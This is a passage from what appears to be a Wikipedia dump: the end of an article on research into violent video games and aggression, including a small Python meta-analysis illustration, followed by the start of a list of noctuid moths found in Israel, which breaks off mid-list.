variables they assessed increased aggression, including unjustified violence, availability of weapons, and rewards. Three context variables, role-playing, extent of violence, and humor, were associated with decreased aggression. It is unknown if the observed changes between the two surveys are actually contextual effects. The researchers found that the context and quality of the violence in video games affect children more than the simple presence and amount of violence, and that these effects differ from child to child. In 2008, the Pew Internet and American Life Project statistically examined the impact of video gaming on youths' social and communal behaviors. Teens who had communal gaming experiences reported much higher levels of civic and political engagement than teens who had not had these kinds of experiences. Youth who took part in social interaction related to the game, such as commenting on websites or contributing to discussion boards, were more engaged communally and politically. Among teens who play games, 63% reported seeing or hearing "people being mean and overly aggressive while playing," 49% reported seeing or hearing "people being hateful, racist or sexist while playing", and 78% reported witnessing "people being generous or helpful while playing". In 2009, a report of three studies conducted among students of different age groups in Singapore, Japan, and the United States found that prosocial, mostly nonviolent, games increased helpful prosocial behaviour among the participants. 
In 2010, Patrick and Charlotte Markey suggested that violent video games only caused aggressive feelings in individuals who had a preexisting disposition, such as high neuroticism, low agreeableness, or low conscientiousness. In 2010, after a review of the effects of violent video games, the Attorney-General's Office of Australia reported that even though the Anderson meta-analysis of 2010 was the pinnacle of the scientific debate at that time, significant harm from violent video games had not been persuasively proven or disproven, except that there was some consensus that they might be harmful to people with aggressive or psychotic personality traits. The attorney-general considered a number of issues, including: social and political controversy about the topic; lack of consensus about definitions and measures of aggression and violent video games (for example, whether a cartoon game has the same impact as a realistic one); that levels of aggression may or may not be an accurate marker for the likelihood of violent behaviour; that the playing of violent video games may not be an independent variable in determining violent acts (for example, violent behaviour after playing violent video games may be age dependent, or players of violent video games may watch other violent media); and that studies may not have been long or large enough to provide clear conclusions. In 2010, researchers Paul Adachi and Teena Willoughby at Brock University critiqued experimental video game studies on both sides of the debate, noting that experimental studies often confounded violent content with other variables such as competitiveness. In a follow-up study, the authors found that competitiveness, but not violent content, was associated with aggression. In 2011, a thirty-year study of 14,000 college students, published by the University of Michigan, which measured overall empathy levels in students, found that these had dropped by 40% since the 1980s. The biggest drop came after the year 2000, which the authors speculated was due to multiple factors, including increased societal emphasis on selfishness, changes in parenting practices, increased isolation due to time spent with information technology, and greater immersion in all forms of violent and/or narcissistic media including, but not limited to, news, television and video games. The authors did not provide data on media effects, but referenced various research on the topics. In 2011, in a longitudinal study of youth in Germany, von Salisch found that aggressive children tend to select more violent video games. This study found no evidence that violent games caused aggression in minors. The author speculated that other studies may have been affected by "single responder bias" due to self-reporting of aggression rather than reporting by parents or teachers. In 2012, a Swedish study examined the cooperative behavior of players in The Lord of the Rings Online. The authors argued that attempts to link collaborative or aggressive behavior within the game to real-life behavior would rely on unwarranted assumptions regarding equivalencies of forms of cooperation and the material conditions of the environment in-game and out-of-game. One study from Morgan Tear and Mark Nielsen in 2013 concluded that violent video games did not reduce or increase prosocial behavior, failing to replicate previous studies in this area. 
In 2013, Isabela Granic and colleagues at Radboud University Nijmegen, the Netherlands, argued that even violent video games may promote learning, health, and social skills, but that not enough games had been developed to treat mental health problems. Granic et al. noted that both camps have valid points, and that a more balanced and complex picture is necessary. In 2014, Ferguson and Olson found no correlation between video game violence and bullying or delinquency in children with preexisting attention deficit disorder or depressive symptoms. In 2014, Villanova professor Patrick M. Markey conducted a study with 118 teenagers suggesting that video games have no influence on increased aggression in users; however, he did find that when played for a moderate amount of time (roughly one hour) video games can make children nicer and more socially interactive. This information was provided by the teens' teachers at their schools. A 2014 study by Andrew Przybylski at Oxford University examined the impact of violent content and frustration on hostility among video game players. In a series of experiments, Przybylski and colleagues demonstrated that frustration, but not violent content, increased player hostility. The authors also demonstrated that some previous "classic" violent video game experiments were difficult to replicate. One longitudinal study from 2014 suggested that violent video games were associated with very small increases in risk-taking behavior over time. In 2015, the American Psychological Association released a review that found a link between violent video games and aggressive behavior, with Mark Appelbaum, the chair of the task force that conducted the review, saying that "the link between violence in video games and increased aggression in players is one of the most studied and best established in the field." However, Appelbaum also characterized the size of the correlation as "not very big". The same review found insufficient evidence of a link between such video games and crime or delinquency. Critics, including Peter Gray and Christopher Ferguson, expressed concerns about methodological limitations of the review. Ferguson stated that "I think (the task force members) were selected because their opinions were pretty clear going in." At least four of the seven task force members had previously expressed opinions on the topic; critics argued this alone constitutes a conflict of interest, while a task force member responded that "If it were common practice to exclude all scientists after they render one conclusion, the field would be void of qualified experts". A 2015 study examined the impact of violent video games on young adult players with autism spectrum disorders (ASD). The study found no evidence for an impact of playing such games on aggression among ASD players. These results appeared to contradict concerns, raised following the 2012 Sandy Hook shooting, that individuals with ASD or other mental conditions might be particularly susceptible to violent video game effects. One study from 2016 suggested that "sexist" games (using games from the Grand Theft Auto series as exemplars) may reduce empathy toward women. Although no direct game effect was found, the authors argued that an interaction between game condition, masculine role norms, gender and avatar identification produced enough evidence to claim causal effects. 
Comments by other scholars on this study reflected some concerns over the methodology, including a possible failure of the randomization to game conditions. In 2016, a preregistered study of violent video game effects concluded that violent video games did not influence aggression in players. The preregistered nature of the study removed the potential for the scholars to "nudge" the results of the study in favor of the hypothesis, and suggests that preregistration of future studies may help clarify results in the field. Meta-analyses Because the results of individual studies have often reached different conclusions, debate has often shifted to the use of meta-analysis. This method attempts to average across individual studies, determine whether there is some effect on average, and test possible explanations for differences between study results. A number of meta-analyses have been conducted, at times reaching different conclusions. A 2001 meta-analysis reviewing the relationship between video game violence and aggression in teenagers (n = 3,033) found a significant and positive correlation, indicating that exposure to high levels of video game violence was associated with greater aggression among teenagers. Another meta-analysis conducted the same year by John Sherry was more skeptical of effects, specifically questioning whether the interactivity of video games gave them a greater effect than other media. Sherry later published another meta-analysis in 2007, again concluding that the influence of video game violence on aggression was minimal. Sherry also criticized the observed dose-response curve, reporting that smaller effects were found in experimental studies with longer exposure times, where one might expect greater exposure to cause greater effects. In 2010, Anderson's group published a meta-analysis of one hundred and thirty international studies with over 130,000 participants. He reported that exposure to violent video games caused both short-term and long-term aggression in players and decreased empathy and pro-social behavior. However, other scholars criticized this meta-analysis for excluding non-significant studies and for other methodological flaws. Anderson's group has defended the analysis, rejecting these critiques. Rowell Huesmann, a psychology and social studies academic at the University of Michigan, wrote an editorial supporting the Anderson meta-analysis. A later re-analysis of the Anderson meta-analysis suggested that there was greater publication bias among experiments than Anderson and colleagues had accounted for. This indicated that the effects observed in laboratory experiments may have been smaller than estimated and perhaps not statistically significant. A reply by Anderson and colleagues acknowledged that there was publication bias among experiments, but disagreed that the degree of bias was large enough to bring the effect into question. A 2015 meta-analysis of video game effects suggested that video games, including violent games, had minimal impact on children's behavior, including violence, prosocial behavior and mental health. The journal included a debate section on this meta-analysis, with scholars who were both supportive and critical of it. The original author also responded to these comments, arguing that few coherent methodological critiques had been raised. In 2016, Kanamori and Doi replicated the original "Angry Birds" meta-analysis and concluded that critiques of the original meta-analysis were largely unwarranted. 
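To make the pooling step described above concrete, the following is a minimal sketch in Python of an inverse-variance-weighted (fixed-effect) average of correlation coefficients, the kind of effect size these meta-analyses typically combine. The per-study values are entirely hypothetical and are shown only to illustrate the general technique, not to reproduce any of the analyses discussed in this section.

```python
import math

# Hypothetical per-study results: (correlation r, sample size n).
# These numbers are invented purely for illustration.
studies = [(0.15, 200), (0.05, 1000), (0.20, 80), (-0.02, 450)]

def fixed_effect_meta(studies):
    """Inverse-variance-weighted average of correlations via Fisher's z."""
    num, den = 0.0, 0.0
    for r, n in studies:
        z = math.atanh(r)   # Fisher z-transform of the correlation
        w = n - 3           # inverse of the variance of z, i.e. 1/(1/(n-3))
        num += w * z
        den += w
    z_bar = num / den       # weighted mean in z-space
    return math.tanh(z_bar) # back-transform to a pooled correlation

print(f"pooled r = {fixed_effect_meta(studies):.3f}")
```

Larger studies receive proportionally more weight, which is why debates about which studies to include and how to correct for publication bias, as described above, can change the pooled estimate.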
In 2018, a meta-analysis of the relationship between violent video game play and physical aggression over time found that "violent video game play is positively associated with aggressive behavior, aggressive cognition, and aggressive affect, as well as negatively associated with empathy for victims of violence and with prosocial behavior". A 2020 meta-analysis of long-term outcome studies concluded that evidence did not support links between earlier playing of violent games and later aggression. The authors reported that the overall correlation was very small, and stated that better-quality studies were less likely to find evidence for effects than poorer-quality studies. fMRI studies Some scholars worry there may be an effect of violent video games on brain activity, although such concerns are highly contentious. Some scientists have attempted to use functional magnetic resonance imaging (fMRI) to study this hypothesis. Some studies suggested that participants who engaged with violent video games (VVGs) displayed increases in the functioning of their amygdala and decreases in the functioning of their frontal lobe. Some scholars argue that the effect on the frontal lobe may be similar to the deactivation seen in disruptive behavior disorders. However, potential funding conflicts of interest have been noted for some of these studies. During the Brown v. Entertainment Merchants Association legal case, it was noted that the studies conducted by Kronenberger were openly funded by "The Center for Successful Parenting", which may represent a conflict of interest. Further, other studies have failed to find a link between violent games and diminished brain function. For example, an fMRI study by Regenbogen and colleagues suggested VVGs do not diminish the ability to differentiate between real and virtual violence. Another study from 2016 using fMRI found no evidence that VVGs led to a desensitization effect in players. In a BBC interview, Simone Kuhn explained that the brain effects seen in prior fMRI studies likely indicated that players were simply able to distinguish between reality and fiction and modulate their emotional reaction accordingly, not becoming desensitized. Studies on the effect on crime In 2008, records held by the US Office of Juvenile Justice and Delinquency Prevention and Office of Justice Programs indicated that arrests for violent crime in the US had decreased since the early 1990s in both children and adults. This decrease occurred contemporaneously with increasing sales of violent video games and increases in graphically violent content in those games. Studies of violent video game playing and crime have generally not supported the existence of causal links. Studies of juveniles as well as criminal offenders have generally not uncovered evidence for links. Some studies have suggested that violent video game playing may be associated with reductions in some types of aggression, such as bullying. Studies of mass shootings have, likewise, provided no evidence for links with violent video games. A 2002 report from the US Secret Service found that school shooters appeared to consume relatively low levels of violent media. Some criminologists have specifically referred to claims linking violent video games to mass shootings as a "myth". Some studies have examined the consumption of violent video games in society in relation to violent crime rates. Generally, it is acknowledged that societal violent video game consumption has been associated with over an 80% reduction in youth violence in the US during the corresponding period. 
However, scholars note that, while this data is problematic for arguments that violent video games increase crime, such data is correlational and cannot be used to conclude that video games have caused this decline in crime. Other studies have examined data on violent video games and crime trends more closely and have come to the conclusion that the release of very popular violent video games is causally associated with corresponding declines in violent crime in the short term. A 2011 study by the Center for European Economic Research found that violent video games may be reducing crime, possibly because the time spent playing games reduces time spent engaged in more antisocial activities. Other studies by Patrick Markey and Scott Cunningham have come to similar conclusions. Public debate in US In the early 1980s, Ronnie Lamm, the president of the Long Island PTA, sought legislation to govern the proximity of video game arcades to schools. In the 1990s, Joe Lieberman, a US Senator, chaired a hearing about violent video games such as Mortal Kombat. David Grossman, a former West Point psychology professor and retired lieutenant colonel, wrote books about violence in the media, including On Killing (1996) and Stop Teaching Our Kids to Kill (1999). He described first-person shooter games as murder simulators, and argued that video game publishers unethically train children in the use of weapons and harden them emotionally to the act of murder by simulating the killing of hundreds or thousands of opponents in a single typical video game. In 2003, Craig A. Anderson, a researcher who testified on the topic before the U.S. Senate, said, "[S]ome studies have yielded nonsignificant video game effects, just as some smoking studies failed to find a significant link to lung cancer. But when one combines all relevant empirical studies using meta-analytic techniques, it shows that violent video games are significantly associated with: increased aggressive behavior, thoughts, and affect; increased physiological arousal; and decreased pro-social (helping) behavior." In 2005, Anderson was criticized in court for failing to give balanced expert evidence. In 2008, in Grand Theft Childhood: The Surprising Truth About Violent Video Games and What Parents Can Do, Kutner and Olson disputed claims that violent video games cause an increase in violent behavior in children. They reported a statistically non-significant trend showing that adolescents who do not play video games at all are most at risk for violent behavior, and that video game play is part of an adolescent boy's normal social setting. However, the authors did not completely deny the negative influences of violent (M-rated) video games on pre-teens and teenagers: Kutner and Olson suggested that the views of alarmists and those of representatives of the video game industry are often supported by flawed or misconstrued studies, and that the factors leading to violence in children and adolescents were more subtle than whether or not they played violent video games. Henry Jenkins, an academic in media studies, said, "According to federal crime statistics, the rate of juvenile violent crime in the United States is at a 30-year low. Researchers find that people serving time for violent crimes typically consume less media before committing their crimes than the average person in the general population. It's true that young offenders who have committed school shootings in America have also been game players. 
But young people in general are more likely to be gamers—90 percent of boys and 40 percent of girls play. The overwhelming majority of kids who play do not commit antisocial acts. According to a 2001 U.S. Surgeon General's report, the strongest risk factors for school shootings centered on mental stability and the quality of home life, not media exposure. The moral panic over violent video games is doubly harmful. It has led adult authorities to be more suspicious and hostile to many kids who already feel cut off from the system. It also misdirects energy away from eliminating the actual causes of youth violence and allows problems to continue to fester." In 2013, Corey Mead, a professor of English at Baruch College, wrote about how the U.S. military financed the original development of video games and has long used them for training, recruitment, and the treatment of post-traumatic stress disorder. He also argues that the two industries are currently intertwined with each other in a "military-entertainment complex". Writing in 2013, scholars James Ivory and Malte Elson noted that, although research on video game effects remained inconclusive, the culture of the academic field itself had become very contentious and that politicians had put pressure on scientists to produce specific research findings. The authors concluded it is improper for scholars or legislators to, at present, portray video games as a public health crisis. Research by Oxford psychologist Andrew Przybylski has shown that Americans are split in opinion on how video game violence links to gun violence. Przybylski found that older people, women rather than men, people who knew less about games, and people who were very conservative in ideology were most likely to think video games could cause gun violence. Several advocacy groups focus on video game violence as a topic. Groups such as Parents Against Violence, Parents Against Media Violence and One Million Moms take stances aimed at limiting the violence in video games and other media, while groups such as the Entertainment Software Association seek to refute their claims. Video games, particularly violent ones, are often mentioned as a cause of major gun crimes in the wake of school shootings by young adults. For example, Adam Lanza, the 20-year-old shooter at the Sandy Hook Elementary School shooting, was found to have numerous video games in his possession, leading some people to blame video games for the shooting; however, the State Attorney did not link video games to the event in the final report on the incident, though it identified that video game addiction may have been connected. In February 2018, following the Stoneman Douglas High School shooting in Florida, President Donald Trump, among others, said "the level of violence on video games is really shaping young people's thoughts". Rhode Island state representative Robert Nardolillo also proposed legislation to tax violent video games (those rated "Mature" or higher by the ESRB) to use the funds to support mental health programs in the state. 
Following the Stoneman Douglas shooting, President Trump arranged to meet with several video game industry professionals on March 8, 2018. Attendees, besides Trump and several members of Congress, included Mike Gallagher, the president and CEO of the ESA; Pat Vance, the president of the ESRB; Strauss Zelnick, CEO of Take-Two Interactive; Robert Altman, CEO of ZeniMax Media; Brent Bozell, founder of the Media Research Center; and Melissa Hanson, program manager for the Parents Television Council. The meeting was not designed to come to a solution but only for the invited parties to present their stances on video games and their relationship to violent activity, so as to help determine appropriate steps in the future. At the start of the meeting, the President showed the attendees a short 88-second video of numerous violent video game segments put together by his staff, including the infamous "No Russian" level from Call of Duty: Modern Warfare 2, which featured the player watching and potentially participating in a massacre of civilians in an airport. The White House later released the video to YouTube, where it quickly became popular due to the controversy over the relationship between video games and real-life violence; despite being unlisted shortly after being uploaded, it had received about 2.7 thousand likes and 93 thousand dislikes as of April 5, 2018. The video is still accessible via URL, and media outlets like IGN included links to the original in their responses to the matter. Games for Change made an 88-second video of their own, composed of video game segments and cutscenes more cinematic and emotional in nature; their video had received upwards of 463,000 views as of April 5, 2018, as well as about 13 thousand likes and 203 dislikes. In the description of the video, they said, "After seeing that the White House produced a video depicting video games as ultra-violent, we felt compelled to share a different view of games. Video games, their innovative creators and the vast community of players are so much more than what is depicted in the White House’s video. We wanted to create our own version, at the same length, to challenge the White House’s misdirected blame being placed upon video games. To all you game developers and players who create and enjoy games – this is for you! #GAMEON" Nation-specific factors Australia Video games are rated in Australia by the Australian Classification Board (ACB), run out of the federal Attorney-General's Department. The ACB also oversees film ratings and applies the same ratings system to video games. Broadly, the ratings system is based on a number of factors, including violence. The ACB can refuse to classify a film or game if it deems the content to be beyond the allowable guidelines for the strictest ratings. Titles refused classification by the ACB are thus illegal to sell within Australia, and fines apply to those who attempt to import such games, while titles with more mature ratings may be sold under regulated practices. Prior to 2011, video games could only qualify for up to an "MA15+" rating, and not the next-highest tier of "R18+", which was allowed for films. Several high-profile games were thus banned in Australia. The ACB agreed to allow video games to have R18+ ratings in 2011, and some previously banned games were subsequently allowed under R18+. References External links Video gaming Violence in video games Video game controversies Moral panic
24284823
https://en.wikipedia.org/wiki/List%20of%20moths%20of%20Israel%20%28Noctuidae%29
List of moths of Israel (Noctuidae)
This is a list of moths of the family Noctuidae (sensu Kitching & Rawlins, 1999) that are found in Israel. It also acts as an index to the species articles and forms part of the full List of moths of Israel. Subfamilies are listed alphabetically. Subfamily Acontiinae Acontia biskrensis (Oberthür, 1887) Acontia lucida (Hüfnagel, 1766) Acontia titania (Esper, 1798) Acontia trabealis (Scopoli, 1763) Aedia funesta (Esper, 1786) Aedia leucomelas (Linnaeus, 1758) Armada maritima Brandt, 1939 Armada nilotica A. Bang-Haas, 1912 Armada panaceorum (Ménétriès, 1849) Coccidiphaga scitula (Rambur, 1833) Diloba caeruleocephala (Linnaeus, 1758) Tarachephia hueberi (Ershov, 1874) Subfamily Acronictinae Acronicta aceris (Linnaeus, 1758) Acronicta psi (Linnaeus, 1758) Acronicta pasiphae Draudt, 1936 Acronicta rumicis (Linnaeus, 1758) Acronicta tridens [Denis & Schiffermüller, 1775] Craniophora ligustri (Denis & Schiffermüller, 1775) Craniophora pontica (Staudinger, 1879) Craniophora melanisans Wiltshire, 1980 Subfamily Amphipyrinae Pyrois effusa (Boisduval, 1828) Amphipyra pyramidea (Linnaeus, 1758) Amphipyra micans Lederer, 1857 Amphipyra boursini Hacker, 1998 Amphipyra tetra (Fabricius, 1787) Amphipyra stix Herrich-Schäffer, 1850 Subfamily Bagisarinae Ozarba sancta (Staudinger, 1900) Pseudozarba bipartita (Herrich-Schäffer, 1850) Pseudozarba mesozona (Hampson, 1896) Xanthodes albago (Fabricius, 1794) Subfamily Bryophilinae Cryphia algae (Fabricius, 1775) Cryphia ochsi (Boursin, 1941) Cryphia tephrocharis Boursin, 1953 Cryphia rectilinea (Warren, 1909) Cryphia amseli Boursin, 1952 Cryphia labecula (Lederer, 1855) Cryphia raptricula ([Denis & Schiffermüller], 1775) Cryphia petrea (Guenée, 1852) Cryphia maeonis (Lederer, 1865) Cryphia paulina (Staudinger, 1892) Cryphia amasina (Draudt, 1931) Simyra dentinosa Freyer, 1839 Victrix tabora (Staudinger, 1892) Victrix marginelota (de Joannis, 1888) Subfamily Catocalinae Acantholipes circumdata (Walker, 1858) Acantholipes regularis (Hübner, [1813]) Aedia funesta (Esper, [1786]) Aedia leucomelas (Linnaeus, 1758) Africalpe intrusa Krüger, 1939 Anomis flava (Fabricius, 1775) Anomis sabulifera (Guenée, 1852) Antarchaea erubescens (A. Bang-Haas, 1906) Anumeta arabiae Wiltshire, 1961 Anumeta asiatica Wiltshire, 1961 Anumeta atrosignata (Walker, 1858) Anumeta hilgerti Rothschild, 1909 Anumeta spilota Ershov, 1874 Anumeta straminea (A. Bang-Haas, 1906) Anydrophila stuebeli (Calberla, 1891) Apopestes spectrum (Esper, [1787]) Armada maritima Brandt, 1939 Armada nilotica (A. 
Bang-Haas, 1906) Armada panaceorum (Ménétries, 1849) Autophila anaphanes Boursin, 1940 Autophila cerealis (Staudinger, 1871) Autophila einsleri Amsel, 1935 Autophila libanotica (Staudinger, 1901) Autophila ligaminosa (Eversmann, 1851) Autophila limbata (Staudinger, 1871) Autophila pauli Boursin, 1940 Catephia alchymista ([Denis & Schiffermüller, 1775) Catocala amnonfreidbergi (Kravchenko et al., 2008) Catocala brandti Hacker & Kaut, 1999 Catocala conjuncta (Esper, [1787]) Catocala conversa (Esper, [1787]) Catocala disjuncta (Geyer, 1828) Catocala diversa (Geyer, [1828]) Catocala editarevayae Kravchenko et al., 2008 Catocala elocata (Esper, [1787]) Catocala eutychea (Treitschke, 1835) Catocala hymenaea ([Denis & Schiffermüller], 1775) Catocala lesbia Christoph, 1887 Catocala nymphaea (Esper, [1787]) Catocala nymphagoga (Esper, [1787]) Catocala olgaorlovae Kravchenko et al., 2008 Catocala puerpera (Giorna, 1791) Catocala separata (Freyer, 1848) Cerocala sana Staudinger, 1901 Clytie arenosa Rothschild, 1913 Clytie delunaris (Staudinger, 1889) Clytie haifae (Habich, 1905) Clytie illunaris (Hübner, [1813]) Clytie infrequens (C. Swinhoe, 1884) Clytie sancta (Staudinger, 1898) Clytie scotorrhiza Hampson, 1913 Clytie syriaca (Bugnion, 1837) Clytie terrulenta (Christoph, 1893) Crypsotidia maculifera (Staudinger, 1898) Drasteria cailino (Lefèbvre, 1827) Drasteria flexuosa (Ménétries, 1847) Drasteria herzi (Alphéraky, 1895) Drasteria kabylaria (A. Bang-Haas, 1906) Drasteria oranensis Rothschild, 1920 Dysgonia algira (Linnaeus, 1767) Dysgonia rogenhoferi (Bohatsch, 1880) Dysgonia torrida (Guenée, 1852) Epharmottomena eremophila (Rebel, 1895) Exophyla rectangularis (Geyer, [1828]) Gnamptonyx innexa (Walker, 1858) Grammodes bifasciata (Petagna, 1788) Heteropalpia acrosticta (Püngeler, 1904) Heteropalpia profesta (Christoph, 1887) Iranada turcorum (Zerny, 1915) Lygephila craccae (Denis & Schiffermüller, 1775) Lygephila lusoria (Linnaeus, 1758) Minucia lunaris (Denis & Schiffermüller, 1775) Minucia wiskotti (Püngeler, 1902) Ophiusa tirhaca (Cramer, 1777) Pandesma robusta (Walker, 1858) Pericyma albidentaria (Freyer, 1842) Pericyma squalens Lederer, 1855 Plecoptera inquinata (Lederer, 1857) Plecoptera reflexa Guenée, 1852 Prodotis boisdeffrii (Oberthür, 1867) Prodotis stolida (Fabricius, 1775) Rhabdophera arefacta (C. 
Swinhoe, 1884) Scodionyx mysticus Staudinger, 1900 Scoliopteryx libatrix (Linnaeus, 1758) Tarachephia hueberi (Ershov, 1874) Tathorhynchus exsiccata (Lederer, 1855) Tyta luctuosa (Denis & Schiffermüller, 1775) Tytroca dispar (Püngeler, 1904) Tytroca leucoptera (Hampson, 1896) Ulotrichopus tinctipennis stertzi (Püngeler, 1907) Zethes insularis Rambur, 1833 Subfamily Condicinae Condica capensis (Guenée, 1852) Condica viscosa (Freyer, 1831) Condica palaestinensis (Staudinger, 1895) Subfamily Cuculliinae Brachygalea albolineata (Blachier, 1905) Brachygalea kalchbergi (Staudinger, 1892) Lithophasia quadrivirgula (Mabille, 1888) Lithophasia venosula Staudinger, 1892 Metlaouia autumna (Chrétien, 1910) Cucullia syrtana (Mabille, 1888) Cucullia argentina (Fabricius, 1787) Cucullia santolinae Rambur, 1834 Cucullia calendulae Treitschke, 1835 Cucullia santonici (Hübner, [1813]) Cucullia boryphora Fischer de Waldheim, 1840 Cucullia improba Christoph, 1885 Cucullia macara Rebel, 1948 Shargacucullia blattariae (Esper, 1790) Shargacucullia barthae (Boursin, 1933) Shargacucullia lychnitis (Rambur, 1833) Shargacucullia anceps (Staudinger, 1882) Shargacucullia strigicosta (Boursin, 1940) Shargacucullia macewani (Wiltshire, 1949) Shargacucullia verbasci (Linnaeus, 1758) Calocucullia celsiae (Herrich-Schäffer, 1850) Metalopha gloriosa (Staudinger, 1892) Metalopha liturata (Christoph, 1887) Calophasia platyptera (Esper, [1788]) Calophasia barthae Wagner, 1929 Calophasia angularis (Chrétien, 1911) Calophasia sinaica (Wiltshire, 1948) Pamparama acuta (Freyer, 1838) Cleonymia jubata (Oberthür, 1890) Cleonymia warionis (Oberthür, 1876) Cleonymia opposita (Lederer, 1870) Cleonymia pectinicornis (Staudinger, 1859) Cleonymia baetica (Rambur, 1837) Cleonymia chabordis (Oberthür, 1876) Cleonymia fatima (Bang-Haas, 1907) Teinoptera culminifera Calberla, 1891 Teinoptera gafsana (Blachier, 1905) Omphalophana antirrhinii (Hübner, [1803]) Omphalophana anatolica (Lederer, 1857) Omphalophana pauli (Staudinger, 1892) Recophora beata (Staudinger, 1892) Metopoceras omar (Oberthür, 1887) Metopoceras delicata (Staudinger, 1898) Metopoceras philbyi Wiltshire, 1980 Metopoceras solituda (Brandt, 1938) Metopoceras kneuckeri (Rebel, 1903) Metopoceras felicina (Donzel, 1844) Rhabinopteryx subtilis (Mabille, 1888) Oncocnemis confusa persica persica Ebert, 1878 Oncocnemis exacta Christoph, 1887 Oncocnemis strioligera Lederer, 1853 Xylocampa mustapha Oberthür, 1920 Stilbia syriaca Staudinger, 1892 Stilbina hypaenides Staudinger, 1892 Hypeuthina fulgurita Lederer, 1855 Subfamily Eriopinae Callopistria latreillei (Duponchel, 1827) Subfamily Eublemminae Calymma communimacula ([Denis & Schiffermüller], 1775) Eublemma albina (Staudinger, 1898) Eublemma albivestalis Hampson, 1910 Eublemma apicipunctalis (Brandt, 1939) Eublemma cynerea (Turati, 1924) Eublemma cochylioides (Guenée, 1852) Eublemma cornutus Fibiger & Hacker, 2004 Eublemma deserti Rothschild, 1909 Eublemma gayneri (Rothschild, 1901) Eublemma gratissima (Staudinger, 1892) Eublemma hansa (Herrich-Schäffer, 1851) Eublemma kruegeri (Wiltshire, 1970) Eublemma ostrina (Hübner, 1808) Eublemma pallidula (Herrich-Schäffer, 1856) Eublemma parva (Hübner, 1808) Eublemma polygramma (Duponchel, 1836) Eublemma scitula (Rambur, 1833) Eublemma siticulosa (Lederer, 1858) Eublemma subvenata (Staudinger, 1892) Eublemma suppura (Staudinger, 1892) Eublemma tomentalis Rebel, 1947 Honeyana ragusana (Freyer, 1844) Rhypagla lacernaria (Hübner, 1813) Metachrostis dardouini (Boisduval, 1840) Metachrostis velox 
(Hübner, 1813) Metachrostis velocior Staudinger, 1892 Subfamily Eustrotiinae Eulocastra diaphora (Staudinger, 1879) Subfamily Euteliinae Eutelia adulatrix (Hübner, 1813) Eutelia adoratrix (Staudinger, 1892) Subfamily Hadeninae Orthosia cruda Denis & Schiffermüller, 1775 Orthosia cypriaca Hacker, 1996 Orthosia cerasi (Fabricius, 1775) Perigrapha mundoides (Boursin, 1940) Egira tibori Hreblay, 1994 Tholera hilaris (Staudinger, 1901) Anarta sabulorum (Alphéraky, 1882) Anarta engedina Hacker, 1998 Anarta arenbergeri (Pinker, 1974) Anarta mendax (Staudinger, 1879) Anarta mendica (Staudinger, 1879) Anarta trifolii (Hufnagel, 1766) Anarta stigmosa (Christoph, 1887) Cardepia sociabilis (Graslin, 1850) Cardepia affinis Rothschild, 1913 Thargelia gigantea Rebel, 1909 Odontelia daphnadeparisae Kravchenko, Ronkay, Speidel, Mooser & Müller, 2007 Lacanobia oleracea (Linnaeus, 1758) Lacanobia softa (Staudinger, 1898) Sideridis implexa (Hübner, 1813) Dicerogastra chersotoides (Wiltshire, 1956) Saragossa siccanorum (Staudinger, 1870) Hecatera bicolorata (Hufnagel, 1766) Hecatera weissi (Boursin, 1952) Hecatera dysodea (Denis & Schiffermüller, 1775) Hecatera cappa (Hübner, 1809) Hecatera fixseni (Christoph, 1883) Enterpia laudeti (Boisduval, 1840) Hadena magnolii (Boisduval, 1829) Hadena compta ([Denis & Schiffermüller], 1775) Hadena adriana (Schawerda, 1921) Hadena gueneei (Staudinger, 1901) Hadena clara (Staudinger, 1901) Hadena persimilis Hacker, 1996 Hadena drenowskii (Rebel, 1930) Hadena syriaca (Osthelder, 1933) Hadena perplexa ([Denis & Schiffermüller], 1775) Hadena silenes (Hübner, 1822) Hadena sancta (Staudinger, 1859) Hadena pumila (Staudinger, 1879) Hadena silenides (Staudinger, 1895) Mythimna ferrago (Fabricius, 1787) Mythimna vitellina (Hübner, 1808) Mythimna straminea (Treitschke, 1825) Mythimna congrua (Hübner, 1817) Mythimna languida (Walker, 1858) Mythimna l-album (Linnaeus, 1767) Mythimna sicula (Treitschke, 1835) Mythimna alopecuri (Boisduval, 1840) Mythimna riparia (Rambur, 1829) Mythimna unipuncta (Haworth, 1809) Leucania putrescens (Hübner, 1824) Leucania punctosa (Treitschke, 1825) Leucania herrichii Herrich-Schäffer, 1849 Leucania palaestinae Staudinger, 1897 Leucania joannisi Boursin & sporten, 1952 Leucania zeae (Duponchel, 1827) Leucania loreyi (Duponchel, 1827) Polytela cliens (Felder & Rogenhofer, 1874) Subfamily Heliothinae Chazaria incarnata (Freyer, 1838) Heliothis viriplaca (Hufnagel, 1766) Heliothis nubigera (Herrich-Schäffer, 1851) Heliothis peltigera ([Denis & Schiffermüller], 1775) Helicoverpa armigera (Hübner, [1808]) Schinia scutosa ([Denis & Schiffermüller], 1775) Periphanes delphinii (Linnaeus, 1758) Pyrrhia treitschkei (Frivaldsky, 1835) Aedophron phlebophora (Lederer, 1858) Masalia albida (Hampson, 1905) Subfamily Hypeninae Nodaria nodosalis (Herrich-Schäffer, [1851]) Polypogon lunalis (Scopoli, 1763) Polypogon plumigeralis (Hübner, [1825]) Hypena obsitalis (Hübner, [1813]) Hypena lividalis (Hübner, 1796) Hypena munitalis Mann, 1861 Zekelita antiqualis (Hübner, [1809]) Zekelita ravalis (Herrich-Schäffer, 1851) Subfamily Hypenodinae Schrankia costaestrigalis (Stephens 1834) Schrankia taenialis (Hübner, [1809]) Subfamily Metoponiinae Aegle semicana (Esper, 1798) Aegle rebeli Schawerda, 1923 Aegle exquisita Boursin, 1969 Aegle ottoi (Schawerda, 1923) Megalodes eximia (Freyer, 1845) Haemerosia renalis (Hübner, 1813) Haemerosia vassilininei A. 
